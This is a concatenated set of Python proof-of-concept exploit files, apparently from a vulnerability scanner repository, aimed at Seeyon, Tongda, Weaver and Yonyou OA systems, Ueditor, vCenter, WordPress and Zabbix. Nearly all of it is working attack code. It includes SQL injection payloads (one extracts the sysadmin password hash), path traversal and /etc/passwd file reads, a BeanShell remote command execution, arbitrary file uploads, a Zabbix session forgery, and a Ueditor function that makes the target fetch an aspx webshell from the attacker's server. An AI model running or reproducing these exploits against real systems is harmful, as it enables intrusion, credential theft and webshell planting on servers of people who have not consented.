/pocs/web/seeyon/seeyon_get_sessionslist.py: -------------------------------------------------------------------------------- 1 | import requests,re 2 | import urllib 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '致远OA Session泄漏漏洞(后台可getshell)', 7 | 'url': url, 8 | 'vulnerable': False, 9 | 'attack': False, 10 | 'about': 'https://www.zhihuifly.com/t/topic/3345, https://www.seebug.org/vuldb/ssvid-93312' 11 | } 12 | timeout = 3 13 | headers = { 14 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", 15 | } 16 | payload = '/yyoa/ext/https/getSessionList.jsp?cmd=getAll' 17 | vurl = urllib.parse.urljoin(url, payload) 18 | try: 19 | req = requests.get(vurl, headers=headers, timeout=timeout) 20 | if req.status_code == 200 and re.search('[0-9A-Z]{32}', req.text): 21 | relsult['vulnerable'] = True 22 | relsult['vurl'] = vurl 23 | return relsult 24 | except: 25 | return relsult 26 | 27 | -------------------------------------------------------------------------------- /pocs/web/seeyon/seeyon_oa_a8_htmlofficeservlet_getshell.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': '致远 OA A8 htmlofficeservlet getshell 漏洞', 9 | 'vulnerable': False 10 | } 11 | payload = '/seeyon/htmlofficeservlet' 12 | try: 13 | vurl = urllib.parse.urljoin(url, payload) 14 | req = requests.get(vurl, timeout=3) 15 | if re.search('DBSTEP', req.text) and re.search('htmoffice', req.text): 16 | relsult['vulnerable'] = True 17 | relsult['url'] = url 18 | relsult['payload'] = vurl 19 | relsult['about'] = 'http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/' 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | -------------------------------------------------------------------------------- /pocs/web/seeyon/seeyon_thirdpartycontroller_getshell.py: -------------------------------------------------------------------------------- 1 | import requests,re 2 | import urllib 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '致远OA Session泄露(thirdpartyController.do)', 7 | 'url': url, 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'about': 'https://www.cnblogs.com/nul1/p/14749349.html, https://blog.csdn.net/maverickpig/article/details/118916085' 11 | } 12 | timeout = 3 13 | headers = { 14 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", 15 | } 16 | payload = '/seeyon/thirdpartyController.do' 17 | data = 'method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1' 18 | vurl = urllib.parse.urljoin(url, payload) 19 | try: 20 | req = requests.post(vurl, headers=headers, timeout=timeout, data=data, verify=False) 21 | if req.status_code == 200 and re.search('seeyon', req.headers['Set-Cookie']) and re.search('JSESSIONID', req.headers['Set-Cookie']): 22 | relsult['vulnerable'] = True 23 | relsult['vurl'] = vurl 24 | return relsult 25 | except: 26 | return relsult 27 | -------------------------------------------------------------------------------- /pocs/web/tongda/tongda_sqli_getdata_php.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, urllib 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '通达OA sql注入(/general/reportshop/utils/get_datas.php)', 7 | 'vulnerable': False, 8 | 'url': url, 9 | 'about': 'https://forum.butian.net/share/278', 10 | } 11 | timeout = 3 12 | payload = r'''?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5%20whe\re%201={`\=%27`%201}%20un\ion%20(s\elect%20uid,sid%20fr\om%20user_online%20whe\re%201\={`=`%201})--%20%27''' 13 | vurl = urllib.parse.urljoin(url, '/general/reportshop/utils/get_datas.php') 14 | vurl2 = urllib.parse.urljoin(url, '/general/reportshop/utils/get_datas.php' + payload) 15 | try: 16 | rep1 = requests.get(vurl, timeout=timeout, verify=False) 17 | if rep1.status_code == 200 and re.search("未指定业务", rep1.text): 18 | rep2 = requests.get(vurl2, timeout=timeout, verify=False) 19 | if rep2.status_code == 200 and re.search("[a-z0-9]{26}", rep2.text): 20 | relsult['vulnerable'] = True 21 | relsult['vurl'] = vurl2 22 | return relsult 23 | except: 24 | return relsult 25 | -------------------------------------------------------------------------------- /pocs/web/tongda/tongda_videofile_fileread.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '通达OA v2017 video_file.php 任意文件下载漏洞', 7 | 'vulnerable': False, 8 | 'url': url, 9 | 'about': 'http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20video_file.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.html' 10 | } 11 | headers = { 12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0', 13 | "Content-Type": "application/x-www-form-urlencoded" 14 | } 15 | payload = '/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php' 16 | timeout = 3 17 | vurl = urllib.parse.urljoin(url, payload) 18 | try: 19 | res = requests.get(vurl, headers=headers,timeout=timeout, verify=False) 20 | if res.status_code == 200 and re.search('\$ROOT_PATH=getenv\("DOCUMENT_ROOT"\);', res.text) and re.search('\$ATTACH_PATH=\$ROOT_PATH\."attachment/";', res.text): 21 | relsult['vulnerable'] = True 22 | relsult['vurl'] = vurl 23 | return relsult 24 | else: 25 | return relsult 26 | except: 27 | return relsult -------------------------------------------------------------------------------- /pocs/web/ueditor_1433_parsing_vulnerabilitly.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | import requests, re 4 | import urllib 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'Ueditor编辑器1.4.3.3 解析漏洞', 9 | 'vulnerable': False, 10 | 'attack': True, 11 | } 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 14 | 'Content-Type': 'application/x-www-form-urlencoded', 15 | } 16 | try: 17 | vulurl = urllib.parse.urljoin(url, '/ueditor/net/controller.ashx?action=catchimage') 18 | req = requests.get(vulurl, timeout=3, verify=False) 19 | if re.search(r'没有指定抓取源', req.text) or re.search(r'参数错误:没有指定抓取源', req.text): 20 | test_png = 'https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png?1=1.aspx' 21 | payload = r'source[]={0}'.format(test_png) 22 | req2 = requests.post(url=vulurl, headers=headers, timeout=3, verify=False, data=payload) 23 | if re.search(r'"url":"(.)*"', req2.text): 24 | upload_path = re.findall(r'"url":"(.*)"', req2.text)[0] 25 | verify_url = urllib.parse.urljoin(vulurl, upload_path) 26 | relsult['vulnerable'] = True 27 | relsult['url'] = url 28 | relsult['method'] = 'POST' 29 | relsult['vulurl'] = vulurl 30 | relsult['position'] = 'data' 31 | relsult['payload'] = payload 32 | relsult['verify'] = verify_url 33 | relsult['about'] = 'https://www.cnblogs.com/hei-zi/p/13394764.html' 34 | return relsult 35 | return relsult 36 | except: 37 | return relsult 38 | 39 | 40 | def attack(url): 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 43 | 'Content-Type': 'application/x-www-form-urlencoded', 44 | } 45 | try: 46 | print('\n[+] 正在加载 Ueditor编辑器1.4.3.3 解析漏洞EXP模块......') 47 | print('[+] 请上传aspx图片马到自己的公网服务器') 48 | png_path = input('[+] 输入aspx图片马的地址:') 49 | png_path = png_path + '?1=1.aspx' 50 | payload = r'source[]={0}'.format(png_path) 51 | vulurl = urllib.parse.urljoin(url, '/ueditor/net/controller.ashx?action=catchimage') 52 | req2 = requests.post(url=vulurl, headers=headers, timeout=3, verify=False, data=payload) 53 | if re.search(r'"url":"(.)*"', req2.text): 54 | print('[@] 上传成功!!!') 55 | upload_path = re.findall(r'"url":"(.*)"', req2.text)[0] 56 | webshell = urllib.parse.urljoin(vulurl, upload_path) 57 | print('[+] Webshell地址:', webshell) 58 | return True 59 | return False 60 | except: 61 | return False 62 | -------------------------------------------------------------------------------- /pocs/web/vmware/CVE_2021_21972.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'CVE-2021-21972 vSphere Client RCE', 7 | 'vulnerable': False, 8 | 'url': url, 9 | 'about': 'https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/blob/main/CVE-2021-21972.py, https://github.com/0xAgun/CVE-2021-40870/blob/main/poc.py' 10 | } 11 | headers = { 12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0', 13 | "Content-Type": "application/x-www-form-urlencoded" 14 | } 15 | version_path = '/sdk/vimServiceVersions.xml' 16 | payload = '/ui/vropspluginui/rest/services/uploadova' 17 | timeout = 3 18 | vurl = urllib.parse.urljoin(url, payload) 19 | finger_url = urllib.parse.urljoin(url, version_path) 20 | try: 21 | finger_rep = requests.get(finger_url, headers=headers, timeout=timeout, verify=False) 22 | if re.search(".+", finger_rep.text): 23 | rep = requests.get(vurl, headers=headers, timeout=timeout, verify=False) 24 | if rep.status_code == 405 and 'Method Not Allowed' in rep.text: 25 | relsult['vulnerable'] = True 26 | return relsult 27 | except: 28 | return relsult 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /pocs/web/weaver/CNVD_2019_32204.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204 3 | # Fofa: app="泛微-协同办公OA" 4 | import requests 5 | import sys,re 6 | import urllib 7 | 8 | 9 | def verify(target): 10 | relsult = { 11 | 'name': '泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204', 12 | 'vulnerable': False 13 | } 14 | headers = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | } 18 | target = urllib.parse.urljoin(target, "weaver/bsh.servlet.BshServlet") 19 | payload = """bsh.script=\\u0065\\u0078\\u0065\\u0063("whoami");&bsh.servlet.output=raw""" 20 | try: 21 | requests.packages.urllib3.disable_warnings() 22 | request = requests.post(headers=headers, url=target, data=payload, timeout=5, verify=False) 23 | if ";" not in request.text and re.search('BeanShell', request.text): 24 | if "Login.jsp" not in request.text: 25 | if "Error" not in request.text: 26 | if "" not in request.text: 27 | relsult['vulnerable'] = True 28 | relsult['url'] = target 29 | relsult['method'] = 'POST' 30 | relsult['payload'] = payload 31 | relsult['about'] = 'https://www.cnblogs.com/yyhuni/p/14544814.html, https://blog.csdn.net/dust_hk/article/details/101621462' 32 | return relsult 33 | return relsult 34 | except: 35 | return relsult 36 | 37 | 38 | -------------------------------------------------------------------------------- /pocs/web/weaver/CNVD_2019_34241.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 泛微OA WorkflowCenterTreeData接口SQL注入(仅限oracle数据库) CNVD-2019-34241 3 | # Fofa: app="泛微-协同办公OA" 4 | 5 | import requests 6 | import urllib 7 | import re 8 | import time 9 | 10 | headers = { 11 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25', 12 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 13 | 'Accept-Language': 'zh-CN,zh;q=0.9', 14 | 'Content-Type': 'application/x-www-form-urlencoded' 15 | } 16 | 17 | def verify(url): 18 | relsult = { 19 | 'name': '泛微OA WorkflowCenterTreeData接口注入(限oracle数据库)', 20 | 'vulnerable': False 21 | } 22 | target = urllib.parse.urljoin(url, 'mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333') 23 | payload = "formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1" 24 | try: 25 | requests.packages.urllib3.disable_warnings() 26 | res = requests.post(url=target, data=payload, headers=headers, verify=False, timeout=10) 27 | res.encoding = res.apparent_encoding 28 | if res.status_code == 200 and re.search(r'\[\{.+\}\]', res.text): 29 | relsult['vulnerable'] = True 30 | relsult['url'] = url 31 | relsult['method'] = 'POST' 32 | relsult['payload'] = payload 33 | relsult['about'] = 'https://zhuanlan.zhihu.com/p/86082614' 34 | return relsult 35 | else: 36 | return relsult 37 | except: 38 | return relsult 39 | 40 | -------------------------------------------------------------------------------- /pocs/web/weaver/CNVD_2021_49104.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from urllib.parse import urlparse 3 | import socket 4 | import urllib,re 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'CNVD-2021-49104——泛微E-Office文件上传漏洞', 9 | 'vulnerable': False 10 | } 11 | payload = b''' 12 | POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 13 | Host: 127.0.0.1:7899 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 15 | Accept-Encoding: gzip, deflate 16 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 17 | Connection: close 18 | Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6 19 | Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348 20 | Content-Length: 193 21 | Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 22 | 23 | --e64bdf16c554bbc109cecef6451c26a4 24 | Content-Disposition: form-data; name="Filedata"; filename="test.php" 25 | Content-Type: image/jpeg 26 | 27 | 28 | 29 | --e64bdf16c554bbc109cecef6451c26a4-- 30 | '''.replace(b'\n', b'\r\n') 31 | try: 32 | oH = urlparse(url) 33 | a = oH.netloc.split(':') 34 | port = 80 35 | if 2 == len(a): 36 | port = a[1] 37 | elif 'https' in oH.scheme: 38 | port = 443 39 | host = a[0] 40 | with socket.create_connection((host, port), timeout=5) as conn: 41 | conn.send(payload) 42 | req1 = conn.recv(10240).decode() 43 | verify_url = urllib.parse.urljoin(url, '/images/logo/logo-eoffice.php') 44 | req2 = requests.get(verify_url, timeout=3) 45 | if re.search('PHP Version', req2.text) and req2.status_code == 200: 46 | relsult['vulnerable'] = True 47 | relsult['method'] = 'POST' 48 | relsult['url'] = url 49 | relsult['verify'] = verify_url 50 | relsult['about'] = 'https://blog.csdn.net/weixin_44309905/article/details/121588557' 51 | return relsult 52 | return relsult 53 | except: 54 | return relsult 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /pocs/web/weaver/TestFile_weaver_common_ctrl_upload.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tr0uble-mAker/POC-bomber/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/pocs/web/weaver/TestFile_weaver_common_ctrl_upload.zip -------------------------------------------------------------------------------- /pocs/web/weaver/e_cology_v8_sqli.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 泛微OA V8 前台 SQL注入获取管理员 sysadmin MD5的密码值 3 | # Fofa: app="泛微-协同办公OA" 4 | 5 | import re 6 | import requests 7 | import urllib3 8 | import urllib 9 | 10 | 11 | def verify(url): 12 | relsult = { 13 | 'name': '泛微OA V8前台Sql注入', 14 | 'vulnerable': False 15 | } 16 | target_url = urllib.parse.urljoin(url, "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager") 17 | headers = { 18 | "User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36" 19 | } 20 | 21 | try: 22 | urllib3.disable_warnings() 23 | res = requests.get(url=target_url, headers=headers, verify=False, timeout=3) 24 | verify = urllib.parse.urljoin(url, '/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id') 25 | v = requests.get(url=verify, headers=headers, verify=False, timeout=3) 26 | if res.status_code == 200 and 'html' not in res.text and re.search('1234', v.text): 27 | relsult['vulnerable'] = True 28 | relsult['user'] = 'sysadmin' 29 | relsult['MD5(password)'] = res.text.strip() 30 | relsult['payload'] = target_url 31 | relsult['about'] = 'https://blog.csdn.net/weixin_43227251/article/details/115653646' 32 | return relsult 33 | else: 34 | return relsult 35 | except: 36 | return relsult 37 | 38 | 39 | -------------------------------------------------------------------------------- /pocs/web/weaver/weaver_common_ctrl_upload.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # 泛微OA weaver.common.Ctrl 任意文件上传 3 | # Fofa: app="泛微-协同办公OA" 4 | 5 | import zipfile 6 | import random, os 7 | import requests, re, urllib, platform 8 | 9 | def file_zip(mm, webshell_name2): 10 | shell = """yhsnksianksxouwyqnalifhasdnslxzhdydklosicys""" ## 替换shell内容 11 | zf = zipfile.ZipFile(mm + '.zip', mode='w', compression=zipfile.ZIP_DEFLATED) 12 | zf.writestr(webshell_name2, shell) 13 | 14 | #mm = generate_random_str(8) 15 | def verify(urllist): 16 | relsult = { 17 | 'name': '泛微OA weaver.common.Ctrl 任意文件上传漏洞', 18 | 'vulnerable': False 19 | } 20 | path = str(os.path.abspath('.')) 21 | if 'Windows' in platform.system(): 22 | mm = path + '\pocs\web\weaver\TestFile_weaver_common_ctrl_upload' 23 | else: 24 | mm = path + '/pocs/web/weaver/TestFile_weaver_common_ctrl_upload' 25 | del_file = './{0}.zip'.format(mm) # 生成的垃圾文件 26 | webshell_name1 = mm + '.txt' 27 | webshell_name2 = '../../../' + webshell_name1 28 | try: 29 | file_zip(mm, webshell_name2) 30 | urls = urllist + 'weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp' 31 | file = [('file1', (mm + '.zip', open(mm + '.zip', 'rb'), 'application/zip'))] 32 | 33 | requests.post(url=urls, files=file, timeout=3, verify=False) 34 | GetShellurl = urllib.parse.urljoin(urllist, 'cloudstore/' + webshell_name1) 35 | GetShelllist = requests.get(url=GetShellurl, timeout=3, verify=False) 36 | if GetShelllist.status_code == 200 and re.search(r'yhsnksianksxouwyqnalifhasdnslxzhdydklosicys', GetShelllist.text): 37 | relsult['vulnerable'] = True 38 | relsult['url'] = urllist 39 | relsult['verify'] = GetShellurl 40 | relsult['about'] = 'https://mp.weixin.qq.com/s/ePYRFPfu-pvWMKSiffporA, https://www.xpshuai.cn/posts/20282/' 41 | return relsult 42 | else: 43 | return relsult 44 | except: 45 | return relsult 46 | 47 | 48 | -------------------------------------------------------------------------------- /pocs/web/weaver/weaver_ecology_getsqldata_sqli.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'Weaver-E-Cology-getSqlData-sqli', 7 | 'vulnerable': False, 8 | 'url': url, 9 | 'about': 'https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md' 10 | } 11 | timeout = 3 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0', 14 | 'Content-Type': 'application/x-www-form-urlencoded', 15 | } 16 | vurl = urllib.parse.urljoin(url, '/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version') 17 | try: 18 | rep = requests.get(vurl, headers=headers, timeout=timeout) 19 | if rep.status_code == 200 and 'Microsoft SQL Server' in rep.text and 'status":true' in rep.text: 20 | relsult['vulnerable'] = True 21 | relsult['verify'] = vurl 22 | return relsult 23 | except: 24 | return relsult -------------------------------------------------------------------------------- /pocs/web/wordpress/CVE_2018_7422.py: -------------------------------------------------------------------------------- 1 | import re 2 | import requests 3 | import urllib 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'CVE-2018-7422 WordPress Site Editor < 1.1.1 Local File Inclusion(LFI)', 9 | 'vulnerable': False, 10 | 'attack': False, 11 | } 12 | 13 | payload = '/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd' 14 | targetUrl = urllib.parse.urljoin(url, payload) 15 | try: 16 | res = requests.get(targetUrl, timeout=3, verify=False) 17 | if re.search('root:x:0:0', res.text) and re.search('"success":true', res.text): 18 | relsult['vulnerable'] = True 19 | relsult['url'] = url 20 | relsult['verify'] = targetUrl 21 | relsult['about'] = 'https://blog.csdn.net/weixin_47311099/article/details/122854894, http://cve.scap.org.cn/vuln/VH-CVE-2018-7422' 22 | return relsult 23 | else: 24 | return relsult 25 | except: 26 | return relsult 27 | -------------------------------------------------------------------------------- /pocs/web/yongyou/yongyou_nc-find-web_fileread.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '用友NC 任意文件读取(/NCFindWeb)', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | 'url': url, 10 | } 11 | timeout = 3 12 | headers = { 13 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ", 14 | 'Content-Type': 'application/x-www-form-urlencoded', 15 | } 16 | payload = '/NCFindWeb?service=IPreAlertConfigService&filename=/' 17 | vurl = urllib.parse.urljoin(url, payload) 18 | try: 19 | rep = requests.get(url, headers=headers, timeout=timeout, verify=False) 20 | if rep.status_code == 200 and re.search("ufida", rep.text): 21 | rep2 = requests.get(vurl, headers=headers, timeout=timeout, verify=False) 22 | if rep2.status_code == 200 and re.search(".+\.jsp", rep.text): 23 | relsult['vulnerable'] = True 24 | relsult['verify'] = vurl 25 | return relsult 26 | except: 27 | return relsult -------------------------------------------------------------------------------- /pocs/web/zabbix/CVE_2022_23131.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, base64, urllib.parse, json 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'Zabbix SAML 未授权访问(CVE-2022-23131)', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | 'url': url, 10 | 'about': 'https://github.com/Mr-xn/cve-2022-23131, https://www.secpulse.com/archives/179601.html' 11 | 12 | } 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 15 | 'Content-Type': 'application/x-www-form-urlencoded', 16 | } 17 | timeout = 3 18 | try: 19 | rep = requests.get(url, timeout=timeout, headers=headers, verify=False) 20 | if rep.status_code == 200: 21 | session = re.findall("zbx_session=(.*?);", rep.headers.get("Set-Cookie"))[0] 22 | base64_decode = base64.b64decode(urllib.parse.unquote(session, encoding="utf-8")) 23 | session_json = json.loads(base64_decode) 24 | payload = '{"saml_data":{"username_attribute":"Admin"},"sessionid":"%s","sign":"%s"}' % (session_json["sessionid"], session_json["sign"]) 25 | payload_encode = urllib.parse.quote(base64.b64encode(payload.encode())) 26 | relsult['vulnerable'] = True 27 | relsult['zbx_signed_session'] = payload_encode 28 | return relsult 29 | except: 30 | return relsult 31 | 32 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | func_timeout 3 | rich 4 | dnslib 5 | --------------------------------------------------------------------------------